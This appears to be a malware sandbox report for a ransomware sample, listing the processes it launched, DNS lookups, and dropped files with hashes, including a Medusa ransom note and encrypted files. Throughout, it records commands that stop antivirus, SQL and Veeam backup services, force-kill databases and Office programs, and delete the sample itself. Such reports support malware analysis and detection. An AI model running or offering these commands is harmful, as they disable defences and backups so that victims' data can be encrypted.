C:\Windows\system32\net1 stop "sophossps" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$BKUPEXEC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$BKUPEXEC" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$ECWDB2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$ECWDB2" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$PRACTTICEBGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$PRACTTICEBGC" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$PRACTTICEMGT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$PRACTTICEMGT" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SBSMONITORING" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SBSMONITORING" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SHAREPOINT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SHAREPOINT" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SQL_2008" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SQL_2008" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$TPS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$TPS" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$TPSAMA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$TPSAMA" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$VEEAMSQL2012" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2012" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLBrowser" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLBrowser" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLSafeOLRService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLSafeOLRService" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLSERVERAGENT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLSERVERAGENT" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLTELEMETRY" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLTELEMETRY" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLTELEMETRY$ECWDB2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLTELEMETRY$ECWDB2" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLWriter" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLWriter" /y

C:\Windows\SysWOW64\net.exe

net stop "SstpSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "svcGenericHost" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "svcGenericHost" /y

C:\Windows\SysWOW64\net.exe

net stop "swi_filter" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "swi_filter" /y

C:\Windows\SysWOW64\net.exe

net stop "swi_service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "swi_service" /y

C:\Windows\SysWOW64\net.exe

net stop "swi_update_64" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "swi_update_64" /y

C:\Windows\SysWOW64\net.exe

net stop "TmCCSF" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "TmCCSF" /y

C:\Windows\SysWOW64\net.exe

net stop "tmlisten" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "tmlisten" /y

C:\Windows\SysWOW64\net.exe

net stop "TrueKey" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "TrueKey" /y

C:\Windows\SysWOW64\net.exe

net stop "TrueKeyScheduler" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "TrueKeyScheduler" /y

C:\Windows\SysWOW64\net.exe

net stop "TrueKeyServiceHelper" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "TrueKeyServiceHelper" /y

C:\Windows\SysWOW64\net.exe

net stop "UI0Detect" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamBackupSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamBackupSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamBrokerSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamBrokerSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamCatalogSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamCatalogSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamCloudSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamCloudSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamDeploymentService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamDeploymentService" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamDeploySvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamDeploySvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamEnterpriseManagerSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamEnterpriseManagerSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamMountSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamMountSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamNFSSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamNFSSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamRESTSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamRESTSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamTransportSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamTransportSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "W3Svc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "W3Svc" /y

C:\Windows\SysWOW64\net.exe

net stop "wbengine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SysWOW64\net.exe

net stop "WRSVC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "WRSVC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamHvIntegrationSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamHvIntegrationSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "swi_update" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "swi_update" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$CXDB" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$CXDB" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$CITRIX_METAFRAME" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$CITRIX_METAFRAME" /y

C:\Windows\SysWOW64\net.exe

net stop "SQL Backups" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQL Backups" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$PROD" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$PROD" /y

C:\Windows\SysWOW64\net.exe

net stop "Zoolz 2 Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Zoolz 2 Service" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLServerADHelper" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLServerADHelper" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$PROD" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$PROD" /y

C:\Windows\SysWOW64\net.exe

net stop "msftesql$PROD" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "msftesql$PROD" /y

C:\Windows\SysWOW64\net.exe

net stop "NetMsmqActivator" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\SysWOW64\net.exe

net stop "EhttpSrv" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "EhttpSrv" /y

C:\Windows\SysWOW64\net.exe

net stop "ekrn" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ekrn" /y

C:\Windows\SysWOW64\net.exe

net stop "ESHASRV" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ESHASRV" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SOPHOS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SOPHOS" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SOPHOS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SOPHOS" /y

C:\Windows\SysWOW64\net.exe

net stop "AVP" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "AVP" /y

C:\Windows\SysWOW64\net.exe

net stop "klnagent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "klnagent" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SQLEXPRESS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SQLEXPRESS" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SQLEXPRESS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SQLEXPRESS" /y

C:\Windows\SysWOW64\net.exe

net stop "wbengine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SysWOW64\net.exe

net stop "kavfsslp" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "kavfsslp" /y

C:\Windows\SysWOW64\net.exe

net stop "KAVFSGT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "KAVFSGT" /y

C:\Windows\SysWOW64\net.exe

net stop "KAVFS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "KAVFS" /y

C:\Windows\SysWOW64\net.exe

net stop "mfefire" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "mfefire" /y

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM zoolz.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM agntsvc.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM dbeng50.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM dbsnmp.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM encsvc.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM excel.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefoxconfig.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM infopath.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM isqlplussvc.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msaccess.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msftesql.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mspub.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mydesktopqos.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mydesktopservice.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mysqld.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mysqld-nt.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mysqld-opt.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM ocautoupds.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM ocomm.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM ocssd.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM onenote.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM oracle.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM outlook.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM powerpnt.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM sqbcoreservice.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM sqlagent.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM sqlbrowser.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM sqlservr.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM sqlwriter.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM steam.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM synctime.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM tbirdconfig.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM thebat.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM thebat64.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM thunderbird.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM visio.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM winword.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM wordpad.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM xfssvccon.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM tmlisten.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM PccNTMon.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM CNTAoSMgr.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM Ntrtscan.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mbamtray.exe /T

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ping localhost -n 3 > nul & del C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3264 -ip 3264

C:\Windows\SysWOW64\PING.EXE

ping localhost -n 3

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3264 -s 4408

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp

Files

F:\!!!READ_ME_MEDUSA!!!.txt

MD5 059811161d1eb0b9c131d4ca58fb273e
SHA1 137cda40b70978a85f34afcd3e8deac116cfe460
SHA256 e2cfaba956d1da00e2f2ab03474876e7d88e5b746c5c38932af32d6abe85d90b
SHA512 73770f346044da39220bbc0c47e271562d394f14b54f30391af15f09df9d7b0a90adcc06745a5b3681c182ec1db03998cbb6d1f100e81626eae87cddd6097fdd

C:\$Recycle.Bin\S-1-5-21-945322488-2060912225-3527527000-1000\desktop.ini

MD5 0697215b7346df56e37bd31fe9ed97e6
SHA1 b80dcc3878409b70d460e892bed974aec83acd6d
SHA256 3665303e9c7b0cad21a8caa438cba83d8b89094b9c8cebfaba5c4b43496e8e91
SHA512 acc6a7945e73970d152568ad1fa81c49b9c581ee094190db3298fe58e309f0099ac7aef087e1633330f5a2070f68bf54f477732b9f81d662d8c044ef4422cdff

C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db.MEDUSA

MD5 28f78ceb366eb21cfcaa41f542522822
SHA1 5918f52a0c58ceaee04005b92ab9064571b5d4c4
SHA256 f7bd79320007e305c7efdcd879e499040f5d9c1470e7c941a5f588bcf6ffa53c
SHA512 b5ece9ee398efd4b7791f1953435bf97d383c62e3cb662501aba83bf2a5dc7aac9ebc5bf780648185c8e7c7a672406b12d67115ebebb02e6cb964b4733c25218